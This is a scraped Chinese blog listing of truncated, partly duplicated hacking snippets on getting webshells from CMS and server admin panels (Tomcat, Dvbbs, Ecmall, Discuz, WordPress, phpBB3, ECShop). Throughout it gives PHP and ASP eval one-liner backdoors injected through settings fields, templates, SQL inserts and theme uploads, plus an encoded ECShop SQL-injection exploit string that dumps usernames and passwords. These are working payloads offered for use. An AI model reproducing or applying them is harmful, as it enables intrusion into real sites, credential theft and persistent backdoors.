有些Tomcat安装之后没有修改默认密码(用户名admin,密码为空),这样就可以直接登录进去。有两个目录可以访问:/admin/manager/html
/admin 目录下的利用:Service–host–actions–Create New Context建立虚拟目录Document Base填你想浏览的目录,比如c:\,Path自己随便写,例如/guizai然后直接http://ip/g            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2010-03-24 18:12:54
                            
                                585阅读
                            
                                                                             
                 
                
                             
         
            
            
            
             正学习后台拿Shell的方法,今天碰巧在网上看见得到后台拿shell的汇总全集,很不错的总结,分享了!版主给个精华吧!
  今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望大家都能成为脚本高手.
  动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2011-02-08 21:01:10
                            
                                752阅读
                            
                                                                             
                 
                
                             
         
            
            
            
             进后台直奔扩展->挂件管理,下面的每一个挂件都对应着Php文件~拿第一个最新成交挂件举例,直接点击编辑脚本,写你的一句话,然后连接external\widgets\latest_sold\main.widget.php~OK~结束
~另外说下Ecmall现在公布的那个2.2延迟注射其实不用那么麻烦~直接爆错注入就可以了~虽然Ecmall发生错误时会自动跳转到上一页~但是那点儿时            
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2011-05-21 12:03:30
                            
                                1659阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POS            
                
                    
                        
                                                            
                                                                        
                                                                                        翻译
                                                                                            精选
                                                        
                            2013-06-21 11:09:57
                            
                                1503阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            我记得以前看过这个资料,千翻万找总算翻了出来。 
  这个前提是可以编辑模板,不然我估计是没什么希望了。 
  templates/default/actions.lang.php(以这个为例) 
  在最底那提交 
  游客\');?> 
  
  \'g\'=>\'sdfsdf 
  便能写入一句话木马并正常执行. 
             
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2007-12-08 15:38:00
                            
                                1914阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            来自t00ls
不是0day,只是之前用了一周的WP试着做博客来着。发现WP如果能进后台就可以直接拿SHELL的。
大牛说插入404文件,那个何必呢,动别人文件总归是不好,插挂了就悲剧了。
本机建立目录“wawa”,把一句话1.php放进去。打包wawa目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:
wp-content\themes\wa            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2010-12-18 12:21:47
                            
                                1856阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            //target/images/upload/M            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2023-05-19 14:37:47
                            
                                342阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            内容:
phpbb3 拿到管理员账号进去能干什么呢?又不能上传个SHELL。确实很头疼啊
搜半天都没搜到有牛人拿到过。难道没人研究它?
去年就试过些招。还是没搞定。今天遇到个phpbb3。终于还是拿到shell了。。。
要是能找到执行类似phpmyadmin之类的执行数据库语句的地方。拿shell还是比较简单的
需要两条语句。还有绝对路径。。如下
INSERT INTO phpbb            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2011-08-05 23:34:53
                            
                                1523阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            来源:网络
dz后台-全局-ucenter ip地址插入:
3EST\\’);eval($_POST[a])?>;//
保存后再插入一遍!然后连 http://localhost/dz/config.inc.php成功!
以上我在dz7.0-dz.7.2最新官方下载版本测试通过。            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2010-12-28 22:33:49
                            
                                612阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:) 
1.后台编辑customfaq(customfaq.lang.php文件) 
在
Copy code 
eval($_POST[c]); 
2.后台编辑misc(misc.lang.php文件) 
把post_reply_quote对应的内容改为 
Copy code 
";eval($_            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2008-01-29 16:43:00
                            
                                521阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            点模版管理-自定也页面-增加自定义页面 文件格式为.php 内容可以是一句话 可以是大马。。然后保存 在点管理自定义页面 找到你刚才那个 直接点页面名字,就可以访问。            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2010-12-10 10:47:01
                            
                                429阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            来源:网络
dz后台-全局-ucenter ip地址插入:
3EST\\’);eval($_POST[a])?>;//
保存后再插入一遍!然后连 http://localhost/dz/config.inc.php成功!
以上我在dz7.0-dz.7.2最新官方下载版本测试通过。            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2010-07-10 21:04:00
                            
                                3740阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            author:meao
www.secmao.tk  转载请注明
常规设置:站点地址和管理员邮箱处插入代码
站点地址:http://''''''''''''''<?php eval($_POST[cmd])?>'''''''''''''''''''''\\
管理员邮箱:''''''''''''''<?php eval($_POST[cmd])?>            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2010-07-15 21:36:20
                            
                                3875阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            代码就把账号密码注射出来了)search.ph            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2023-05-19 14:37:49
                            
                                526阅读
                            
                                                                             
                 
                
                                
                     
                                    
                             
         
            
            
            
            如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:) 
1.后台编辑customfaq(customfaq.lang.php文件) 
在 
Copy code 
eval($_POST[c]); 
2.后台编辑misc(misc.lang.php文件) 
把post_reply_quote对应的内容改为 
Copy code 
";eval($_POST[c]            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2008-06-29 09:54:00
                            
                                988阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            这个是search.php exp 变种 
search.php?
encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uI            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2011-01-21 19:09:59
                            
                                3072阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            飞鸟游鱼原创
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
2.写入配置文件一句话木马,如果过滤了,(,)可尝试<%eval
request("value")%>来突破,例如
config.asp            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2009-09-24 02:19:02
                            
                                2174阅读
                            
                                                        
                                点赞
                            
                                                                             
                 
                
                             
         
            
            
            
            飞鸟游鱼原创
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
2.写入配置文件一句话木马,如果过滤了,(,)可尝试<%eval
request("value")%>来突破,例如
config.asp            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2010-08-10 22:36:04
                            
                                537阅读
                            
                                                                             
                 
                
                             
         
            
            
            
             
文章没什么意思,唯一亮点就在于dz后台拿shell,不过也全文贴过来吧,图片不全贴了麻烦,就贴2张。Blog:http://hi.baidu.com/zhenker这几天心情很烦躁,于是想找个黑客网站检测下,百度搜到了饭客网,论坛是DZ的,手中没0day,杯具,习惯性的用我自己的明小子扫下,看能扫到啥能利用的,扫了半天扫到了一个很有利用价值的文件如下图:上次跟小凯搞一个黑客站的时候            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2010-11-16 16:36:35
                            
                                855阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            群里有人发个网站 我就看了下 思路很简单 主要要看对方有什么可以利用的
地址我就不发全了
http://www.xxx.com/ch/index.html
进入后台
 
 
后台有点像动易的
看了编辑器 是ew5.5的 没法 被管理员给补了
好吧 我们看下 系统设置 有没有利用的
 
 
在设置里我看的一项生成asp 呵呵 这个就可以利            
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2012-10-29 13:59:26
                            
                                1140阅读